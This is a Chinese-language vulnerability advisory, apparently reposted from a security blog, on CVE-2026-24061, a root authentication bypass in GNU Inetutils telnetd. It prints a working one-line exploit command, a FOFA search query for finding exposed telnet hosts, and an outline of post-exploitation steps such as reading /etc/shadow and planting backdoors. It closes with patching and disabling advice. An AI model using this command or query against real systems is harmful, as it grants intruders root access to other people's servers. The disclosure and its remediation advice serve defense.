【漏洞检测POC】GNUInetutilsTelnetd远程认证绕过漏洞(CVE-2026-24061)

admin
admin
admin
0
文章
0
评论
2026-01-23 12:20:18 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: GNUInetutils2.7及之前版本telnetd因未校验USER变量致攻击者注入-froot参数给/usr/bin/login,可一键绕过认证直接获rootshell;POC已公开,危害极高。建议立即停用telnet改用SSH,或升级至2.8+并限制23端口访问。 综合评分: 92 文章分类: 漏洞分析,漏洞POC,远程认证绕过,网络安全,应急响应

cover_image

【漏洞检测POC】GNU Inetutils Telnetd 远程认证绕过漏洞(CVE-2026-24061)

原创

金夏 金夏

金夏安全

2026年1月22日 16:10 广东

免责声明

本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!

一、漏洞描述

GNU Inetutils 是 GNU 项目提供的一套经典网络工具集,其中包含 telnetd 服务,即 Telnet 服务器守护进程。在 1.9.3 至 2.7 版本中,telnetd 服务在用户认证流程中存在致命缺陷。该服务在调用系统登录程序 /usr/bin/login 时,未能对客户端传入的 USER 环境变量进行有效过滤和校验。攻击者可通过设置一个特定的 USER 变量值,将 -f 参数直接注入到 login 命令中。login 程序的 -f 参数用于“跳过二次认证”,这使得攻击者可以完全绕过所有密码验证环节,直接以 root 用户身份建立远程会话,从而获得服务器的最高控制权。该漏洞危害性极高,相当于一个公开的、无需任何凭证的远程root后门。

二、漏洞检测POC

USER='-f root'&nbsp;telnet -a <目标IP>

关键利用原理: 上述命令将环境变量 USER 设置为 -f root。当存在漏洞的 telnetd 服务接收到连接后,会构造并执行类似以下的系统调用:

/usr/bin/login -f root

此命令的含义是“以 root 用户身份登录,且跳过密码验证”。因此,攻击者得以直接绕过认证。

三、fofa语法

port="23"&nbsp;&& protocol="telnet"

四、漏洞利用链分析

  1. 服务发现:攻击者通过扫描互联网或内网,寻找开放 TCP 23端口 的服务,识别出运行 Telnet 的服务器。
  2. 漏洞探测:向目标发送利用命令。由于漏洞利用即探测,一次成功的连接尝试即代表漏洞存在并利用成功。
  3. 权限获取:连接建立后,攻击者立即获得一个具有 root 权限的交互式 shell,无需进行任何登录交互。
  4. 后续攻击:获得 root 权限后,攻击者可执行任意命令,包括但不限于:
  • 窃取敏感信息:直接读取 /etc/passwd/etc/shadow、应用配置文件、数据库连接字符串等。
  • 植入持久化后门:写入 SSH 授权密钥、安装 rootkit、创建隐藏账户等。
  • 横向移动:利用当前主机作为跳板,攻击内网其他资产。
  • 破坏或勒索:删除数据、加密文件、停止业务服务等。

漏洞修复建议

1. 根本性修复方案

  • 禁用Telnet,启用SSH这是最强烈建议的解决方案。Telnet协议本身以明文传输所有数据(包括利用此漏洞后的所有操作),存在严重的安全缺陷。应立即停止并禁用 telnetd 服务,改用基于非对称密钥认证的 SSH 协议进行远程管理。
  # 停止服务sudo&nbsp;systemctl stop telnetd# 禁用开机自启sudo&nbsp;systemctl&nbsp;disable&nbsp;telnetd# 使用防火墙阻止访问(可选但建议)sudo&nbsp;ufw deny 23/tcp

升级至安全版本:如果业务必须使用 Telnet,请立即将 GNU Inetutils 升级到 2.8 或更高版本

2. 临时缓解措施

  • 网络层隔离:在防火墙或安全组策略中,将 TCP 23 端口的访问权限严格限制于必需的管理员IP地址,禁止对公网或非信任网络开放。
  • 自定义登录程序(高风险):技术专家可尝试配置 telnetd 调用一个经修改的自定义 login 工具,该工具需移除或禁用 -f 参数的功能。此操作复杂且可能影响系统稳定性,仅作权宜之计。

写在最后:

CVE-2026-24061 是一个利用极为简单、危害极其严重的认证绕过漏洞。鉴于其POC已公开,所有使用 GNU Inetutils telnetd 服务的系统均面临迫在眉睫的攻击风险。强烈建议相关管理员立即遵循上述修复建议,优先采用“禁用Telnet,启用SSH”的方案,从根本上消除风险。

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:金夏安全 金夏 金夏《【漏洞检测POC】GNU Inetutils Telnetd 远程认证绕过漏洞(CVE-2026-24061)》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0